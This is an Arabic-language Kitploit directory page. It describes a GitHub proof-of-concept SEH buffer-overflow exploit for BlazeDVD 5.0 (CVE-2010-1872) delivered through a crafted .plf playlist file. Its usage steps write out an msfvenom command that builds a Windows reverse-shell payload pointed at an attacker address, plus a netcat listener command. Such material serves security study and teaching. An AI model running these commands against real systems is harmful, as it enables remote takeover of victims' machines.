Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2010-1872-BlazeDVD-SEH-Exploit — إثبات مفهوم لاستغلال تجاوز سعة المخزن المؤقت من نوع SEH في BlazeDVD 5.0 عبر ملف قائمة تشغيل .plf معدّل، مع توليد حمولة شل عكسية باستخدام msfvenom لأغراض البحث الأمني التعليمي. | Kitploit
أدوات/GitHubGitHub/lipeozyy/cve-2010-1872-blazedvd-seh-exploit
تحليل الثغرات الأمنيةالاستغلالشيل كوداختبار الاختراقالتعلم والتعليمتطوير الحمولاتاستغلال الملفات الثنائية
GitHublipeozyy/cve-2010-1872-blazedvd-seh-exploit

CVE-2010-1872-BlazeDVD-SEH-Exploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات مفهوم لاستغلال تجاوز سعة المخزن المؤقت من نوع SEH في BlazeDVD 5.0 عبر ملف قائمة تشغيل .plf معدّل، مع توليد حمولة شل عكسية باستخدام msfvenom لأغراض البحث الأمني التعليمي.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

BlazeDVD 5.0 - استغلال ثغرة تجاوز سعة المخزن المؤقت لـ SEH في ملفات قائمة التشغيل .PLF (CVE-2010-1872)

إثبات المفهوم (PoC) لاستغلال ثغرة تجاوز سعة المخزن المؤقت في BlazeDVD الإصدار 5.0 عبر ملف قائمة تشغيل .plf مُعدّ. يستخدم الاستغلال الكتابة فوق معالج الاستثناءات المنظمة (SEH) لتحقيق تنفيذ الأوامر.

التفاصيل

  • البرنامج: BlazeDVD
  • الإصدار: 5.0
  • الثغرة: تجاوز سعة المخزن المؤقت عبر ملف .plf
  • التقنية: الكتابة فوق معالج الاستثناءات المنظمة (SEH)
  • CVE: CVE-2010-1872
  • تم الاختبار على: Windows XP SP3 (مع تعطيل DEP و ASLR)

إخلاء مسؤولية

هذا الكود مخصص لأغراض تعليمية وبحثية فقط. قد يؤدي أي إساءة استخدام لهذا الكود إلى انتهاك القوانين المحلية أو الدولية. لا أتحمل أي مسؤولية عن الأضرار الناجمة عن الاستخدام غير السليم.

كيفية العمل

يقوم الاستغلال بإنشاء ملف .plf خبيث، عند فتحه في BlazeDVD، يؤدي إلى تجاوز سعة المخزن المؤقت والكتابة فوق SEH (معالج الاستثناءات المنظمة)، مما يعيد توجيه التنفيذ إلى حمولة شل عكسية.

الاستخدام

  1. إنشاء شيل كود باستخدام msfvenom
    استخدم msfvenom لإنشاء حمولة شل عكسية بتنسيق خام، مع تجنب الأحرف الضارة.

    root@kitploit:~
    msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
    

    استبدل الشيل كود داخل سكريبت الاستغلال بالمخرجات من msfvenom.

  2. تشغيل Netcat (المستمع)
    في طرفية أخرى، ابدأ الاستماع على المنفذ المحدد 8443:

    root@kitploit:~
    nc -lvnp 8443
    
  3. التقاط الشل العكسية
    إذا نجح الأمر، ستتصل شل عكسية بالمستمع الخاص بك.

تنزيل الأداة